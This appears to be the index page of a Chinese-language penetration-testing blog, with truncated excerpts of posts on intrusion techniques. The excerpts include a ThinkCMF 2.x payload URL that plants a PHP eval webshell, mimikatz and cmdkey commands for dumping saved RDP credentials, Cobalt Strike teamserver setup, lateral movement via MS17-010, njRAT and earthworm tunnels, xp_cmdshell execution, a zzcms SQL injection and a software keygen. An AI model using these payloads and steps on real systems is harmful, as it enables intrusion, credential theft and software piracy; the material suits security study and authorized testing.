还原JS Map文件
做项目时发现一个站点为前后分离的架构,翻了下发现了map文件,采用restore-source-tree还原时报错,记录下解决过程
安装先从git克隆到本地
git clone https://github.com/laysent/restore-source-tree.git
然后进入文件夹
npm install
这里建议挂个代理、VPN,国内很慢
这里在win下会报错
λ npm cinstall npm WARN deprecated [email protected]: � Thanks for using Babel: we recommend using babel-preset-env now: please read https://bab ...
Apache Log Viewer 5.X 注册机
抽空研究了下ALV的注册机制,写了个注册机
分析ALV的注册方法是unlockCodeToolStripMenuItem_Click方法,当点击Unlock按钮时会触发注册事件并调用Class2类中的smethod_1、smethod_02个方法进行校验,详细流程见如下代码
unlockCodeToolStripMenuItem_Click方法
private void unlockCodeToolStripMenuItem_Click(object sender, EventArgs e) { string text = this.prefs_0.Key; if (!InputForm.smethod_3("Apache Logs Viewer | " + Class96.smethod_264(), Class96.smethod_143(), ref text)) { return; } if (text != null) { text = text.Trim(); } if (st ...
浪潮ClusterEngineV4.0远程代码执行
c1eaa03b761144d4b351aa8bd40bf7eb6cf248c937441009eef2d13e0b49b0ddd8f41f80c4819f78f66fbf9d0d42c1b42e93892e9631c73b0ab43677392f07637fe67c34bce60fa22292c451a4f8da0894d4424fd875617c575d58066488eca95c75256ba75f2b066b26dafd85390092c8b25e275be03fda676b9c45b92b7cbba662310b16f94b50d6404506a4d2b5984600f81223dec5dacbf03641bd817613fe3d81a3fdfff83c6c46b1f2e0a5b9fc9f10e7fe4f4e6ede39e9aea36596aab061f40d338f03940fb815b30e63cb64991adbbe89801abec5bdf17692d03b50a0950765671dbcf33f054bc88f2892e336b54b7f3c24e53b259 ...
获取远程主机保存的RDP凭据密码
拿下一台运维机,上了个CS,发现曾经连接过几台服务器并且保存了凭据,网上查了圈发现CS不支持交互式mimikatz,记录下获取远程主机RDP凭据。
Windows保存RDP凭据的目录是C:\Users\用户名\AppData\Local\Microsoft\Credentials
可通过命令行获取,执行: cmdkey /list或powerpick Get-ChildItem C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\ -Force注意:cmdkey /list命令务必在Session会话下执行,system下执行无结果。
使用cobalt strike中的mimikatz可以获取一部分接下来要用到的masterkey和pbData
mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\SESSIONID
输出应类似
**BLOB** dwVersion : 00000001 - 1 ...
ThinkCMF缓存getshell
前一阵子接到个项目,目标站是thinkCMF2.X搭建的,试过网上很多方法无法拿下,本地搭了个环境测试了下,最终成功拿下
由于thinkcmf2.x使用了thinkphp3.x作为开发框架,默认情况下启用了报错日志并且开启了模板缓存,导致可以使用加载一个不存在的模板来将生成一句话的PHP代码写入data/runtime/Logs/Portal目录下的日志文件中,再次包含该日志文件即可在网站根目录下生成一句话木马m.php
日志文件格式为YY_MM_DD.log,如当前日期为2019年12月12日,日志文件为19_12_12.log,完整路径为data/runtime/Logs/Portal/19_12_12.log
测试成功的环境Linux
宝塔[PHP7.2]
Windwos
PHPstudy PHP7.1
Payload1:首先访问http://target.domain/?a=display&templateFile=%3C?php%20file_put_contents(%27m.php%27,%27%3C%3fphp+eval($_POST[%22X%22]) ...
Cobalt Strike Teamserer的搭建
记录下Cobalt Strike Teamserer的搭建
环境如下
Ubuntu 18.04
Cobalt Strike 3.14
准备一台Ubuntu 18.04的服务器,下载Cobalt Strike完整文件并传到服务器上
安装JDK1.8
apt install openjdk-8-jdk -y
装好后尝试执行./teamserver 10.16.11.55 cSro0t进行验证
启动成功
添加服务vi /etc/systemd/system/cobaltstrike.service
[Unit]Description=CS ServiceAfter=network.targetWants=network.target[Service]Type=simplePIDFile=/run/CS.pidWorkingDirectory=/path_to_cobaltstrike_root_directory/ExecStart=/path_to_co ...
复盘从一个监控主机到核心路由沦陷
在对内网进行ms17-010扫描时,发现2台之前没有出现过且没有打补丁的主机,于是,尝试了一波
kali主机在扫描时发现2台之前没有出现过且没有打补丁的主机
尝试打了一波
然后种了个njrat
翻文件的时候发现了点配置文件
down下来解压后发现是交换机的配置文件,于是有了一个大胆的想法
查看了被控主机的网络连接后,发现一个地址无法ping通,TCP包也无法到达,推测做了ACL
于是在被控机上搭了earthworm做转发
本机执行ew -s rcsocks -l 本地代理端口 -e 远端连接端口
被控机执行ew -s rssocks -d 主控机IP -e 远端连接端口
然后开启proxifier的代理功能,成功访问了那个系统,但这不是主要目的
在咨询了好哥们后,他建议尝试搞搞交换机看看
在对10.2.66/24网段扫描后发现10.2.66.254开放了80和23端口,尝试xshell连接
成功使用huawei密码[email protected]连接,继续翻上级路由
发现了10.2.20.1
继续telnet
继续翻
发现10.2.20.58
继续翻,翻到 ...
内网渗透
在上次拿下了一台内网主机后,将其作为跳板,对192.168/16网段进行了扫描
介绍先上一张内网环境拓扑图
经过扫描后,识别出几个重要资产,并将他们作为目标进行针对性的测试
192.168.122.8192.168.122.11192.168.122.12192.168.122.13192.168.122.15192.168.122.16192.168.122.54192.168.122.60
通过banner和80端口title
识别到的资产如下
192.168.101.3->锐捷交换机
192.168.135.1->锐捷AC控制器,下联5个AP
192.168.122.8->VMware vCenter主机
192.168.122.6-> ESXi主机
内网大杀器MS17-010的扫描结果
攻击路径:10.46.1.16=192.168.122.16->192.168.122.11->192.168.122.15->192.168.122.54->192.168.122.60->192.168.122.8-& ...
mssql无webshell提权
在内网中扫描到了几台sa权限的mssql,报备后做了次简单的检测
侦查Navicat连上后查看xp_cdshell是否存在
发现存在的
执行exec master..xp_cmdshell "systeminfo"发现网卡连接了一个192.168/16的内网IP
主机名: WIN-XXXXXOS 名称: Microsoft Windows Server 2008 R2 Enterprise OS 版本: 6.1.7601 Service Pack 1 Build 7601OS 制造商: Microsoft CorporationOS 配置: 独立服务器OS 构件类型: Multiprocessor Free注册的所有人: Windows 用户注册的组织: 产品 ID: 00486-001-0001076-84214初始安装日期: 2016/7/29, 17:27:35系统启动时间: 2019 ...
某省HW中遇到的提权
某省HW中遇到的一个环境提权笔记
0x01环境:
OS: Windows Server 2012 R2
补丁情况:
KB3139914 : MS16-032KB3124280 : MS16-016KB3134228 : MS16-014KB3079904 : MS15-097KB3077657 : MS15-077KB3045171 : MS15-051KB3000061 : MS14-058KB2829361 : MS13-046KB2850851 : MS13-053 EPATHOBJ 0day 限32位KB2707511 : MS12-042 sysret -pidKB2124261 : KB2271195 MS10-065 IIS7KB970483 : MS09-020 IIS6
安全软件:360套装
Webshell: :white_check_mark:
内网
既然有16-032,为了一次成功,本地搭个环境,github上面下载到的ms16-032果不其然被Gank了
那么就需要做免杀了,然而自己做的免杀要么
要么
要么是编译好了跑不起来(vs2019编译的, ...
zzcms前台SQL注入
存储型XSS参考文章https://0x20h.com/p/9812.html
SQL注入还是markit()函数,既然没有对URI进行过滤直接写入数据库,那么能不能搞点事情呢?
先看看这个query函数怎么执行的
可以看到直接带入mysqli_query,那么尝试构造下payload吧
原始SQL语句
insert into zzcms_bad (username,ip,dose,sendtime)values('" . $_COOKIE["UserName"] . "','$userip','$url','" . date('Y-m-d H:i:s') . "')
既然只有$url可控,那么直接构造传入的URI就可以了,先直接让数据库执行sleep()函数
insert into zzcms_bad (username,ip,dose,sendtime)values('test','127.0. ...
QQ客户端一处BUG
无意中发现的一处问题
详情因为我电脑安装的flash不是国版的(不是那个某公司二次打包后的)直接安装的adobe官网的导致一些应用无法使用,比如QQ客户端的空间选项卡中的上传图片功能
然后呢,点击时会跳转到aodobe官网
验证猜想,QQ集成了几个web页面,那么如果把aodobe官网重定向呢?
先获取下访问的域名,这点可以用wireshark抓出来
本地hosts再改下,再架个web服务器
再写个html文件,放置于于/www/go/getflashGeoError/
HTML代码如下
<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Comp ...